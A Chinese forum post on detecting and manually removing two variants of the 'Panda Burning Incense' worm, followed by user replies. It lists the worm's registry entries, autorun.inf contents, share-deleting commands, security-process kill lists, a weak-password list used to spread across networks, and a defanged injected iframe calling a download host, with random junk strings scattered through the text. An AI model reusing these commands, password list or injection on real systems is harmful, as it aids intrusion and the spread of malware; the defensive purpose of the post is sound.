熊猫烧香病毒专杀及手动修复方案

鱼宝宝

介绍一下熊猫烧香病毒、熊猫烧香病毒变种的查杀方法，及熊猫烧香病毒的手动清除方案。提供了病毒进程为spoclsv.exe和FuckJacks.exe变种的解决方案，和熊猫烧香病毒专杀工具。

在动手查杀熊猫烧香病毒之前，强烈建议先注意以下四点：

1.本文包含两种熊猫烧香病毒变种的描述，请注意查看病毒症状，根据实际情况选用不同的查杀方法。

2.对于被熊猫烧香病毒感染的.exe可执行文件，推荐先备份，再修复！

3.找回被熊猫烧香病毒删除的ghost(.gho)文件，详情请见文中！

4.对计算机了解不多的用户，请在专家指导下清除熊猫烧香病毒。

熊猫烧香病毒变种一：病毒进程为“spoclsv.exe”

这是“熊猫烧香”早期变种之一，特别之处是“杀死杀毒软件”，最恶劣之处在于感染全盘.exe文件和删除.gho文件（Ghost的镜像文件）。最有“灵感”的一招莫过于在所有htm/html/asp/php/jsp/aspx文件末尾添加一段代码来调用病毒。目前所有专杀工具及杀毒软件均不会修复此病毒行为。需要手动清除病毒添加的代码，且一定要清除。否则访问了有此代码的网页，又会感染。其他老一点的“熊猫烧香”spoclsv变种的病毒行为比此版本少。就不再单独列出。

病毒描述：

“武汉男生”，俗称“熊猫烧香”，这是一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，（.gho为GHOST的备份文件），使用户的系统备份文件丢失。被感染的用户系统中所有.exe可执行文件全部被改成熊猫举着三根香的模样。

以下是熊猫烧香病毒详细行为和解决办法：

熊猫烧香病毒详细行为：

1.复制自身到系统目录下：

%System%\drivers\spoclsv.exe（“%System%”代表Windows所在目录，比如：C:\Windows）
不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。
) ?6 }4 [: b/ p. J/ m1 R
2.创建启动项：
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　"svcshare"="%System%\drivers\spoclsv.exe"

* h+ U2 z+ o# T3 i9 l# R, t, R$ n3.在各分区根目录生成病毒副本：　　X:\setup.exe
; T- }) ^/ k# Q# ~: S　　X:\autorun.inf
  ?" M# k, |% f* dautorun.inf内容：
[AutoRun]
, ]2 A- B8 ?6 `: }　　OPEN=setup.exe
: W: {) t$ l4 F2 F　　shellexecute=setup.exe
/ J+ l7 a5 I8 m' B% C6 z　　shell\Auto\command=setup.exe

4.使用net share命令关闭管理共享：
cmd.exe /c net share X$ /del /y
$ S' h  b* p) _6 L  J* y7 h　　cmd.exe /c net share admin$ /del /y

5.修改“显示所有文件和文件夹”设置：
% d* x4 ?, D; y& }  s[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
  I0 z0 H6 _3 @' V: T8 \9 v　　\Explorer\Advanced\Folder\Hidden\SHOWALL]
　　"CheckedValue"=dword:00000000
4 ~3 h: ]2 B* d, R
1 U- |  x9 m2 S8 E# J6.熊猫烧香病毒尝试关闭安全软件相关窗口：
天网
防火墙进程
VirusScan
) b5 f2 N& b/ j' wNOD32
$ p" S3 w5 o6 G2 C, N网镖杀毒毒霸瑞星江民黄山IE
超级兔子优化大师木马清道夫木馬清道夫
QQ病毒注册表编辑器系统配置实用程序卡巴斯基反病毒
+ i, A  Q- @$ KSymantec AntiVirus
( Q: `4 F3 E2 a7 H: Z! K% pDuba
& D' F1 ^- e( U0 V" u4 T% WWindows 任务管理器
esteem procs
绿鹰PC
$ i0 X0 R& p$ C, x% D) ]+ k7 M密码防盗噬菌体木马辅助查找器
9 {( g$ c4 C+ pSystem Safety Monitor
; c; r& x' N9 V3 fWrapped gift Killer
/ b' T& p8 F6 \/ a# \( Y5 DWinsock Expert
游戏木马检测大师超级巡警
msctls_statusbar32
* I. W; h0 O* s- E5 H3 D: |3 tpjf(ustc)
+ D( e3 o7 s* v3 r8 nIceSword
! \0 u% L" a0 m9 l1 v
* J+ r; _; q) @7.尝试结束安全软件相关进程以及Viking病毒（威金病毒）进程：
Mcshield.exe
　　VsTskMgr.exe
　　naPrdMgr.exe
6 n) \/ G+ ^  @9 S2 \　　UpdaterUI.exe
# l' {) l' G, B- m% z- g　　TBMon.exe
　　scan32.exe
　　Ravmond.exe
　　CCenter.exe
　　RavTask.exe
. _; q! N" ?/ G) V! Z: n　　Rav.exe
% M! T2 k+ e0 c6 _2 S3 }　　Ravmon.exe
　　RavmonD.exe
4 m  L. m7 V, @* w　　RavStub.exe
4 H; |8 T% j( g, B1 m$ f6 ~1 J　　KVXP.kxp
7 E; R$ t* |  E6 N, O3 J$ a/ c7 f　　KvMonXP.kxp
　　KVCenter.kxp
* s( y9 M2 B* q5 @, M$ [4 `; G　　KVSrvXP.exe
　　KRegEx.exe
　　UIHost.exe
3 c& A/ {6 l, _+ F2 k9 F  `　　TrojDie.kxp
　　FrogAgent.exe
　　Logo1_.exe
　　Logo_1.exe
　　Rundl132.exe

$ l% k% n3 x2 B1 l9 E8.禁用安全软件相关服务：
Schedule
　　sharedaccess
7 a) O& [8 I1 d# {5 o1 p　　RsCCenter
/ N5 k# v! N' D　　RsRavMon
' J2 e6 S6 i" C' B0 O" e7 r　　KVWSC
　　KVSrvXP
　　kavsvc
　　AVP
　　McAfeeFramework
　　McShield
5 M8 A: K: M8 X. e* v- O+ }　　McTaskManager
　　navapsvc
; j* u& F' r5 y( C　　wscsvc
. O/ X  i/ S- n6 c　　KPfwSvc
! \/ v* [8 c6 @7 S* q6 U+ }1 U0 N6 w　　SNDSrvc
　　ccProxy
3 Q# [" @" O6 c! K　　ccEvtMgr
　　ccSetMgr
　　SPBBCSvc
　　Symantec Core LC
　　NPFMntor
0 P! _6 \: F8 ^9 I4 h# m; e　　MskService
　　FireSvc
% E( e4 t9 l/ H0 w+ d
+ S4 f6 h& H$ D9 }. A5 K7 S( j9.删除安全软件相关启动项：
/ p  j3 s; a- c1 `) OSOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error           
Reporting Service
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
) i* _" u; c6 ]) v) o, `7 d7 M/ {　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
　　SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse
10.遍历目录修改htm/html/asp/php/jsp/aspx等网页文件，在这些文件尾部追加信息：
5 h1 x# z; x5 F% P5 x5 v<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
但不修改以下目录中的网页文件：
C:\WINDOWS
1 W; Z3 o$ _  C. Z0 p* m$ P! c　　C:\WINNT
　　C:\system32
7 |1 d  M( V5 M- s# q　　C:\Documents and Settings
4 h- I  e, x* {4 Y, @　　C:\System Volume Information
2 ?& U# J8 {3 s$ Z! n* K2 ]( W　　C:\Recycled
　　Program Files\Windows NT
　　Program Files\WindowsUpdate
　　Program Files\Windows Media Player
9 J! F& s* V8 [. n: P" `　　Program Files\Outlook Express
; h$ ?3 J8 ]0 R5 ?( m; y　　Program Files\Internet Explorer
6 t2 G9 o$ V! J% }6 L8 Q+ ^3 L* R　　Program Files\NetMeeting
　　Program Files\Common Files
　　Program Files\ComPlus Applications
　　Program Files\Messenger
　　Program Files\InstallShield Installation Information
9 A  S4 c; F1 L, H4 @　　Program Files\MSN
+ q. W6 h. m' h7 T　　Program Files\Microsoft Frontpage
　　Program Files\Movie Maker
6 `4 ^) o1 ]! N) F" ?　　Program Files\MSN Gamin Zone
( C2 @8 y- S0 e11.在访问过的目录下生成Desktop_.ini文件，内容为当前日期。
: o8 }1 Z! s" T. s' @9 t12.此外，病毒还会尝试删除GHO文件。
病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中：　　password
　　harley
2 f" w4 _; N; S& }. D　　golf
2 R$ ~; v% Y9 p! C" D　　pussy
' m! L( F2 `3 \* i9 Z# W　　mustang
　　shadow
　　fish
4 m  Y4 P2 O6 y# }! [　　qwerty
　　baseball
　　letmein
　　ccc
　　admin
7 U# k8 J) X0 {1 \7 @9 D　　abc
　　pass
　　passwd
　　database
　　abcd
2 i" l8 u1 B. G1 Q+ d9 }$ ?) ]　　abc123
　　sybase
　　123qwe
4 f# ^4 [- r9 \# Z　　server
, f! K/ w8 |* @# d( \. n　　computer
　　super
　　123asd
　　ihavenopass
　　godblessyou
　　enable
　　alpha
# a+ q1 x$ b/ S: R9 l* L" n: N　　1234qwer
& b( B+ K, i/ Q* J+ x$ [; \- r　　123abc
" N' Z. d5 E) n1 k6 k' j( s( z! p7 u　　aaa
! I0 P% U! y2 Y　　patrick
2 p. G/ r2 H- {9 Z6 p6 f  r" `　　pat
! Z) m# D; `# s' W; U& ^0 T　　administrator
　　root
5 f1 b2 C. u0 W! r% v6 k" h; U　　sex
　　god
/ y3 R  S# H: c/ r  @2 A# L. A6 E* x　　fuckyou
! x. K( ]4 M. ~9 D　　fuck
　　test
! Y6 C( X+ ^" e- ^8 [, U$ h　　test123
% e, Z3 Y" [8 n( L( [' h　　temp
3 D4 A3 w+ q$ m1 C0 t6 v　　temp123
% e: O. [8 N" W* V& M　　win
/ V/ E! S: w0 i$ W+ P: u　　asdf
　　pwd
　　qwer
; i0 F) h: x' p　　yxcv
　　zxcv
　　home
　　xxx
　　owner
9 y/ v( O9 H- i# Q" U6 `% E7 F, u8 E　　login
5 b' {' ^1 X8 ~6 Q0 W3 y" O# D) m　　Login
　　love
　　mypc
/ e6 v9 d% t4 A/ P  Q% g1 {2 L　　mypc123
: ^9 V$ w, ^7 Z　　admin123
　　mypass
- K* J% b* p4 D+ J' Y1 }% w- |　　mypass123
　　Administrator
! D( r  u4 J9 h9 t　　Guest
　　admin
　　Root

病毒文件内含有这些信息：

6 q% ?" v7 R; Y* D' `whboy
　　***武*汉*男*生*感*染*下*载*者***
解决方案：

) K7 g0 j; y) h+ l, s1. 结束病毒进程：
' C) m- P; q. \3 k1 p%System%\drivers\spoclsv.exe
7 ~* L9 G9 f9 K2 s% r3 b# X不同的spoclsv.exe变种，此目录可不同。比如12月爆发的变种目录是：C:\WINDOWS\System32\Drivers\spoclsv.exe。但可用此方法清除。
“%System%\system32\spoclsv.exe”是系统文件。（目前看来没有出现插入该系统进程的变种，不排除变种的手法变化。）
查看当前运行spoclsv.exe的路径，可使用超级兔子魔法设置。
( `  V# \; x/ h' B, L6 x
8 X- u+ s; `/ l& w8 A' |2. 删除病毒文件：
%System%\drivers\spoclsv.exe
- z5 d* Z4 u: G+ E1 _9 M9 r! }请注意区分病毒和系统文件。详见步骤1。
2 [5 u& l0 \0 }8 q1 }" [5 |5 V8 i
3. 删除病毒启动项：
2 ]1 @9 ?; T- t[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
　　"svcshare"="%System%\drivers\spoclsv.exe"
1 y7 L8 O- j3 L# h2 R4 f- @0 W
4. 通过分区盘符右键菜单中的“打开”进入分区根目录，删除根目录下的病毒文件：
X:\setup.exe
　　X:\autorun.inf

5. 恢复被修改的“显示所有文件和文件夹”设置：
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
　　\Explorer\Advanced\Folder\Hidden\SHOWALL]
, m+ F( p' T0 x3 k' ~7 Y　　"CheckedValue"=dword:00000001
" ~+ d, S2 k) X2 O* k% h
; n% M# _, g( @- @! D$ J# r4 ^6. 修复或重新安装被破坏的安全软件。
& G" o& I6 Q( H9 v
7.修复被感染的程序。可用专杀工具进行修复，收集了四个供读者使用。
9 Z0 e- S0 p4 R4 u! Z# h金山熊猫烧香病毒专杀工具
http://down.www.kingsoft.com/db/download/othertools/DuBaTool_WhBoy.BAT
安天熊猫烧香病毒专杀工具
http://www.antiy.com/download/KillPP.scr
江民熊猫烧香病毒专杀工具
0 B$ t+ W6 Y: D  v- g* Lhttp://ec.jiangmin.com/test/PandaKiller.rar
7 y6 P% v. C; t! f4 h; q瑞星熊猫烧香病毒专杀工具
' Z) B. a) G. t8 M# L& Khttp://download.rising.com.cn/zsgj/NimayaKiller.scr
。也可用手动方法（见本文末）。
( e* q: R* n' `% l2 y' b" e) P
4 [6 r8 n. ?- g! D3 u8. 恢复被修改的网页文件，可以使用某些编辑网页的工具替换被添加文字为空。机器上有htm/html/asp/php/jsp/aspx等网页文件，一定要删除此段代码。有危险代码的网页一但发布到网页可能会感染其他用户。
- u4 `+ `) w3 T$ y# H$ Y0 }' s  N9 \
! B- x: V. G3 X: A2 t! H熊猫烧香病毒变种二：病毒进程为“FuckJacks.exe”

  X- E7 ]( O/ b' X3 d! x以下是数据安全实验室提供的信息与方法。
, Q* @: E  v+ q& ?2 F5 u, u* ]病毒描述：
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，同时开另外一个线程连接某网站下载ddos程序进行发动恶意攻击。
' ?$ U8 ]% v# \: ?' p3 P
病毒基本情况：
3 Y2 l# G, }0 d5 D' ]1 J2 @- `7 j
( x$ y/ B6 F' n/ |8 _& b[文件信息]

# ~8 ?1 i8 `1 }" s( u* X" V病毒名: Virus.Win32.EvilPanda.a.ex$
: m* h4 }' A# d# c/ S, n　　大小: 0xDA00 (55808), (disk) 0xDA00 (55808)
　　SHA1  : F0C3DA82E1620701AD2F0C8B531EEBEA0E8AF69D
　　壳信息: 未知　　危害级别：高

病毒名: Flooder.Win32.FloodBots.a.ex$
　　大  小: 0xE800 (59392), (disk) 0xE800 (59392)
. Q! s, @( }# t& c' m/ ^　　SHA1  : B71A7EF22A36DBE27E3830888DAFC3B2A7D5DA0D
* F) Q5 X. N: I" a2 c　　壳信息: UPX 0.89.6 - 1.02 / 1.05 - 1.24
　　危害级别：高

病毒行为：
9 u) Y, `$ v3 q' k5 ?
2 G$ F6 {2 J9 n. cVirus.Win32.EvilPanda.a.ex$ ：
: o8 y- D5 g3 t/ d5 N- h
1、病毒体执行后，将自身拷贝到系统目录：
* ]/ E2 c+ ^/ i%SystemRoot%\system32\FuckJacks.exe
0 l! `0 g4 h/ k1 [4 Z8 H
* M1 X- \7 h( s3 W8 U+ ^7 Q
8 R# x5 W* \( y　　2、添加注册表启动项目确保自身在系统重启动后被加载：
键路径：HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
! w3 f  S/ T6 H9 i1 Q　　键名：FuckJacks
　　键值："C:WINDOWS\system32\FuckJacks.exe"
4 M6 q, x0 n. x, C- B7 s
键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
" X8 {2 `  A/ x6 _3 y　　键名：svohost
　　键值："C:WINDOWS\system32\FuckJacks.exe"

1 C0 h, c7 R; [" w- C3、拷贝自身到所有驱动器根目录，命名为Setup.exe，并生成一个autorun.inf使得用户打开该盘运行病毒，并将这两个文件属性设置为隐藏、只读、系统。
; x" b/ x2 s5 Y) kC:autorun.inf    1KB    RHS
　　C:setup.exe    230KB    RHS

4、关闭众多杀毒软件和安全工具。

5、连接*****.3322.org下载某文件，并根据该文件记录的地址，去www.****.com下载某ddos程序，下载成功后执行该程序。
6 n0 i1 ?3 O$ }( F# O
6、刷新bbs.qq.com，某QQ秀链接。
. ^, o( j8 V) ^6 c
7、循环遍历磁盘目录，感染文件，对关键系统文件跳过，不感染Windows媒体播放器、MSN、IE 等程序。
- Q3 |: R; @/ h  `$ L0 I
Flooder.Win32.FloodBots.a.ex$ ：
+ R. V1 H' Q: V. Z6 i, w8 c
1、病毒体执行后，将自身拷贝到系统目录：
( `" _/ q. J8 B$ [2 J0 m( x5 x5 ~0 w%SystemRoot%\SVCH0ST.EXE（注意文件名中的“0”是数字“零”，不是字母“o”）　　%SystemRoot%\system32\SVCH0ST.EXE（注意文件名中的“0”是数字“零”，不是字母“o”）

2、该病毒后下载运行后，添加注册表启动项目确保自身在系统重启动后被加载：
  l, E- I- i2 p! x. V键路径：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
　　键名：Userinit
　　键值："C:WINDOWS\system32\SVCH0ST.exe"

3、连接ddos2.****.com，获取攻击地址列表和攻击配置，并根据配置文件，进行相应的攻击。
配置文件如下：
www。victim.net:3389
7 T0 u' m% k. `8 D2 }2 S# e2 r! R　　www。victim.net:80
! ^& W" D- Q! S! F　　www。victim.com:80
2 P  l6 E- Z' D1 N- q# I0 w　　www。victim.net:80
6 c4 s6 Q( h  l% u, x  I　　1
　　1
! N: R. c+ X5 g* ^! g　　120
, |$ g% x* ]* W" J" s7 |　　50000
+ d" i) @, d* D( f' x' X! ]
解决方案：
. a  k  k& }' e( E1 ]& M
1. 断开网络

; f4 X4 G! ^) W, E. N$ s2 E2. 结束病毒进程：%System%\FuckJacks.exe
  H3 W" R" O' K' Y) Q
3. 删除病毒文件：%System%\FuckJacks.exe
0 i0 {8 m0 J7 N" U: C* n
4. 右键点击分区盘符，点击右键菜单中的“打开”进入分区根目录，删除根目录下的文件：X:\autorun.inf
　　X:\setup.exe
0 p1 S3 B7 {2 @& n% s: q
5. 删除病毒创建的启动项：
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
( W+ I. P; z& D9 m6 A　　"FuckJacks"="%System%\FuckJacks.exe"
9 r* r: X! t; q# J3 Y' e[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
9 _+ b2 k7 `% U7 C5 P. |　　"svohost"="%System%\FuckJacks.exe"

2 A6 H, @$ b- b7 m' a8 _" F6. 修复或重新安装反病毒软件
6 z8 O% e1 X7 l5 [6 j0 i
7. 使用反病毒软件或专杀工具进行全盘扫描，清除恢复被感染的exe文件。也可用以下的手动方法恢复文件。

手动恢复中毒文件（在虚拟机上通过测试，供参考）

1.在清除病毒文件的同时不删除%SYSTEM%下面释放FuckJacks.exe的这个文件，即执行之前的步骤1、2、4、5。

2 q" |% I( n6 N" j! l2.打开“运行”输入“gpedit.msc”打开组策略－本地计算机策略－windows设置－安全设置－软件限制策略－其它规则。在其它规则上右键选择－新散列规则－打开新散列规则窗口

( {* t2 Z0 A1 W% X' S2 F3.在文件散列上点击浏览找到%SYSTEM%下面释放FuckJacks.exe文件。安全级别选择－不允许的。确定后重启。
' `0 s8 n3 ~! |! d. _# W7 q* w
8 j5 z2 N1 ?* o( M4.重启后可以双击运行已经被熊猫感染的程序。运行程序后该FuckJacks.exe文件会在注册表里的Run键下建立启动项（不会有问题的）。

5.双击运行被感染的程序已经恢复原来样子了。全部回复后，用SREng把FuckJacks.exe在注册表里的启动项删除即可！

幻镜

其实还有一个很简单的方法可以将伤害降到最小。

就是将那个GHOST备份文件不要设置为后缀GHO
8 K) @* ]+ y8 p/ b: X
  M$ U. \3 V3 k, g: S6 u你换一个后缀不就没事了吗？
恢复时后缀只是起显示作用
( _# T, k" ?9 c只要你选准正确文件就照样恢复

rulingdanny

很讨厌的病毒 最近中找了 真是对卡巴斯基越来越没有信息了 防御能力＝0

Sonic鼠

妈的我也中招了！！！
存的片子和游戏全没了！！气死我了！！！
  b2 g( f$ V& q# ~" N$ i8 w这病毒出现后没想到是金山反应最快~
瑞星都没招真没用~~~哎…………火大啊……

bmx极限运动

谢谢楼主的分享！！

kk11qq

谢谢楼主的分享！！

kk11qq

谢谢楼主的分享！！